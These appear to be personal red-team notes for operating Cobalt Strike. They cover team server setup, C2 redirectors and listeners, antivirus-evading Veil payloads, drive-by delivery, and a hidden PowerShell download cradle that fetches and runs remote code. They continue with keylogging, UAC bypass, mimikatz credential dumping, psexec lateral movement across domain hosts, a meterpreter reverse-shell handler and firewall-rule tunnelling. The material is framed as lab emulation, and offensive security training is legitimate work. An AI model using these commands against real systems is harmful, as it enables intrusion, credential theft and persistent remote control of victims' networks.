Cobalt Strike

# Opsec

/sbin/iptables -I INPUT 1 -p tcp -s 0.0.0.0/0 --dport 50050 -j DROP
/sbin/iptables -I INPUT 1 -p tcp -s 127.0.0.1 --dport 50050 -j ACCEPT

ssh user@teamserver -L 50050:127.0.0.1:50050
Start the client, set the host to 127.0.0.1
------------------------------------------------------------------------------------------------------------------------------------------------------

Install or update
    cd /opt/cobaltstrike/
    ./update

Remove old data and Beacons (optional)
    Stop the team server
    rm -rf /opt/cobaltstrike/data/

Start the team server
    There are 2 mandotory parameters and 2 optional parameters. The first 2 parameters are required.
    ./teamserver <IP> <password> <Malleable C2 profile> <kill date for Beacons yyyy-mm-dd>

    ./teamserver 192.168.1.5 password /opt/cobaltstrike/malleable-c2-profiles/APT/etumbot.profile 2021-12-31

    When the team server starts, it will display the SHA256 hash of the SSL cert. Send this hash to your team members.

Login to the team server
    Right-click in the Terminal > Split Terminal Horizontally
    cd /opt/cobaltstrike/
    ./cobaltstrike
    Host: <127.0.0.1 if running locally or IP of remote team server>
    Port: 50050
    User: <your nickname>
    Password: <password you entered above>
    Connect
    VerifyFingerprint (SHA256 hash) > Yes
------------------------------------------------------------------------------------------------------------------------------------------------------

# Valid SSL Certificate for Beacon 

Create a Java Keystore file. Use the fully qualified domain name to your Beacon server.
keytool -genkey -keyalg RSA -keysize 2048 -keystore domain.store

Generate a Certificate Signing Request (CSR). Submit this file to your SSL certificate vendor. 
They will verify that you are who you are and issue a certificate.
keytool -certreq -keyalg RSA -file domain.csr -keystore domain.store

Import the Root and any Intermediate Certificates that your SSL vendor provides.
keytool -import -trustcacerts -alias FILE -file FILE.crt -keystore domain.store

Install your Domain Certificate.
keytool -import -trustcacerts -alias mykey -file domain.crt -keystore domain.store
 
Cobalt Strike expects to find the Java Keystore file in the same folder as your Malleable C2 profile.
------------------------------------------------------------------------------------------------------------------------------------------------------

# Redirectors

Create 3 free Ubuntu instances in AWS. These instances will be used for the following:
    Redirector1 - DNS
    Redirector2 - HTTP
    Redirector3 - HTTP3
    
Install socat on each instance.
------------------------------------------------------------------------------------------------------------------------------------------------------

# Create Listeners

Cobalt Strike > Listeners > Add
Name: DNS
Payload: Beacon DNS
DNS Hosts: click + <Redirector1 IP>
OK > Save > OK

Add
Name: HTTP
Payload: Beacon HTTP
HTTP Hosts: click + <Redirector2 IP>
OK > Save > OK

Add
Name: HTTPS
Payload: Beacon HTTPS
HTTPS Hosts: click + <Redirector3 IP>
OK > Save > OK
------------------------------------------------------------------------------------------------------------------------------------------------------

# Launch an attack to gain a foothold.

Disable Windows Defender on your target Windows VM.
    Enterprise: Windows Security > Virus & threat protection > Manage settings > turn off Real-time protection > Yes
    Standard: Windows Defender settings > turn off Real-time protection

Attack 1
    Attacks > Packages > Payload Generator
    Select the listener you just created > Choose
    Output: Veil
    Check Use x64 payload
    Generate
    Select the location for the payload > Save > OK

    cd /opt/Veil
    ./Veil.py
    use 1 (Evasion)
    clean (remove any old artifacts)
    list (look for payloads with shellcode_inject)
    use 12 (cs/shellcode_inject/base64.py)
    generate
    4 - File with shellcode (\x41\x42..)
    /root/payload.txt

    cd /var/lib/veil/output/compiled/payload.exe /tmp
    Attacks > Web Drive-by > Host File
    Browse to the file > Open
    Local URI: /download/update.exe
    Launch
    Copy the contents > Ok
    
Attack 2
    Attacks > Web Drive-by > Scripted Web Delivery (S)
    URI Path: /a
    Local Host: (same IP as your server)
    Local Port: 80 (same port as your Listener)
    Listener: Initial access > Choose
    Type: powershell
    Check Use x64 payload
    Launch

    Copy the download cradle provided > OK
    powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.5:80/a'))"

    Open a Command Prompt on your Windows VM and run the download cradle.

Click on Cobalt Strike and you will see a Beacon session appear in the top pane.

Interact with the Beacon
    Right-click on the Beacon > Interact
    sleep 2                                       Have the Beacon check in once every 2 seconds
    help
    help <command>

Clean up
    exit
    Right click on the Beacon > Session > Remove
    Attacks > Web Drive-by > Manage
    Select each line > Kill
    Liteners > Restart > OK

Attack 3
    Attacks > Packages > HTML Application
    Listener: Initial access > Choose
    Method: Executable
    Generate
    /root/evil.hta
    Save > OK

    Attacks > Web Drive-by > Host File
    File: /root/evil.hta > Open
    Local URI: /survey.txt
    Local Host: 192.168.1.5
    Local Port: 80
    Mime Type: automatic
    Launch > OK

    Copy the URI provided > OK

    Open Internet Explorer on your Wibndows VM to http://192.168.1.5/survey.txt
    Open > Allow
    Click on Cobalt Strike and you will see a Beacon session appear in the top pane.
------------------------------------------------------------------------------------------------------------------------------------------------------

View > Web Log is helpful to know when HTTP requests are hitting your team server.
Use the up arrow to scroll through previous commands.
Beacon is fully tab-completable.
All commands and their output are written to the logs directory.
ctrl+k will clear the current window.
------------------------------------------------------------------------------------------------------------------------------------------------------

# Enumerate host

Seatbelt					  Part of https://github.com/Flangvik/SharpCollection
execute-assembly /opt/Seatbelt.exe -group=system
execute-assembly /opt/Seatbelt.exe -group=user

keylogger <PID> x64                               Inject a keystroke logger into a process
                                                  View > Keylogger > select item in lower left pane

https://github.com/HarmJ0y/Misc-PowerShell/blob/master/Start-ClipboardMonitor.ps1
psinject <PID> x64 Start-ClipboardMonitor -CollectionLimit 5

screenshot <PID> x64                              Take a screenshot
                                                  View > Screenshots > select item in lower left pane

KeeThief					  https://github.com/GhostPack/KeeThief
powershell Get-KeePassDatabaseKey

getuid                                            Get User ID
ps                                                Show process list

pwd                                               Print current directory
ls                                                List files
drives                                            List drives on target

shell tasklist
shell ver
shell ipconfig /all
shell arp -a
shell systeminfo                                  System info
shell net time                                    Show time for a host
shell netstat -ano
shell whoami
shell net start
shell qprocess

net computers                                     List hosts in a domain (groups)
net domain                                        Display domain for this host
net dclist                                        List domain controllers
net domain_controllers                            List DCs in a domain (groups)
net domain_trusts                                 List domain trusts
shell net accounts                                Policy settings for user accounts
net user                                          List users and user information
net group                                         List groups and users in groups
net localgroup                                    List local groups and users in local groups
net localgroup Users                              Show users in the Users security group
net localgroup Administrators                     Show users in the Administrators security group
net logons                                        List users logged onto a host
net sessions                                      List sessions on a host
net share                                         List shares on a host

net view                                          List hosts in a domain (browser service)

jobs                                              List long-running post-exploitation tasks. Look for keylogger JID
jobkill <JID>                                     Kill a long-running post-exploitation task. Kill the keylogger using its JID
jobs                                              Verify the keylogger is no longer running
------------------------------------------------------------------------------------------------------------------------------------------------------

# PowerShell weaponization

powershell <cmdlet> <args>                        Starts powershell.exe and uses the highest supported PowerShell version
powerpick <cmdlet> <args>                         Spawns a sacrificial process specified by spawnto and injects UnmanagedPowerShell into it
psinject <PID> <arch> <cmdlet> <args>             Injects UnmanagedPowerShell into the specified process
------------------------------------------------------------------------------------------------------------------------------------------------------

# Privilege Escalation

powershell-import /opt/PowerSploit/Privesc/PowerUp.ps1
powershell Invoke-PrivescAudit

SharpUp is a C# port of PowerUp			  Part of https://github.com/Flangvik/SharpCollection
Not all checks are ported.
execute-assembly /opt/GhostPack/SharpUp/SharpUp.exe

elevate uac-token-duplication                     Bypass UAC, this gives you a pseudo-high integrity token
elevate svc-exe                                   Creates a SYSTEM service that will run our payload

https://github.com/rasta-mouse/Watson		  Part of https://github.com/Flangvik/SharpCollection

powerpick Invoke-ServiceAbuse -Name 'crappy-service'
spawnas john Password123! smb
Select john in the top pane > right-click > Interact
bypassuac http
john should now be running in a high integrity Beacon (see asterisk)
------------------------------------------------------------------------------------------------------------------------------------------------------

# Credential Abuse

make_token DOMAIN\user password

inject <PID> x64 >listener>

steal_token <PID>

mimikatz !lsadump::sam

SharpDump					  Part of https://github.com/Flangvik/SharpCollection

execute-assembly /opt/Seatbelt.exe LSASettings
execute-assembly /opt/Seatbelt.exe CredGuard
execute-assembly /opt/Seatbelt.exe -q SecPackageCreds

execute-assembly /opt/Rubeus.exe dump
------------------------------------------------------------------------------------------------------------------------------------------------------

# Lateral Movement

Always use a FQDN instead of an IP.
------------------------------------------------------------------------------------------------------------------------------------------------------

upload /tmp/beacon.dll
remote-exec wmi fileserver rundll32 c:\windows\temp\beacon.dll,start
------------------------------------------------------------------------------------------------------------------------------------------------------

# Emulate lateral movement between one victim egress host and four other hosts, that uses SMB for lateral
  movement, as well as follow-on victim to victim communications.

Controller domain: acme.org
Controller IP: x.x.x.x

ifconfig eth0 add x.x.x.x
cd /opt/cobaltstrike/
rm data/*.bin
./teamserver 192.168.1.5 password /opt/cobaltstrike/third-party/profiles/APT/etumbot.profile

Start Cobalt Strike and point to localhost.

Create http and smb listeners.

Launch an attack to gain a foothold.

Login to wkstn-10 as Administrator, open a command prompt, and paste in the PowerShell.
You should have an http Beacon on Cobalt Strike in about 10 sec.

Right-click on the new http Beacon > Interact
sleep 0                                           Make the Beacon interactive
note foothold

ps                                                Look for another user logged in
inject <PID> <arch> <listener>
inject 5678 x64 smb
Right-click on the new smb Beacon > Interact
hashdump                                          Recover local account password hashes
logonpasswords                                    Harvest credentials with mimikatz
View > Credentials

net view /domain
make_token site\administrator password
net group "Domain Computers" /DOMAIN              Show computers joined to the domain
shell nltest /dclist:SITE                         Locate the domain controller
ls \\wkuser-20\C$                                 Test remote access
psexec_psh wkuser-20 smb                          You should have a new smb Beacon in about 10 sec

Right-click on the new smb Beacon > Interact
sleep 2                                           Have the Beacon check in once every 2 seconds
note 1st hop
ps
hashdump
logonpasswords
make_token site\administrator password
ls \\site-file\C$
psexec_psh site-file smb

Right-click on the new http Beacon > Interact
sleep 2
note 2nd hop
ps
hashdump
logonpasswords
make_token site\administrator password
ls \\site-dc\C$
psexec_psh site-dc smb	
	
Right-click on the new http Beacon > Interact
sleep 2
note 3rd hop
------------------------------------------------------------------------------------------------------------------------------------------------------

# Misc notes

# Catch the callback from wkstn-04
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.0.0.80
set lport 443
run
migrate -N explorer.exe

# Make tunnels for wkuser-66
upload fpipeknockoff.windows.amd64.exe s:\\
shell
netsh advfirewall firewall delete rule  name="fpipeknockoff" program="\\site-file\share\fpipeknockoff.windows.amd64.exe" & netsh advfirewall firewall add rule name="fpipeknockoff" dir=in action=allow program="\\site-file\share\fpipeknockoff.windows.amd64.exe" enable=yes & \\site-file\share\fpipeknockoff.windows.amd64.exe -c 10.0.0.80:443 <NUL >NUL 2>NUL & exit
run post/multi/manage/autoroute CMD=add netmask=/32 subnet=172.31.2.66
background
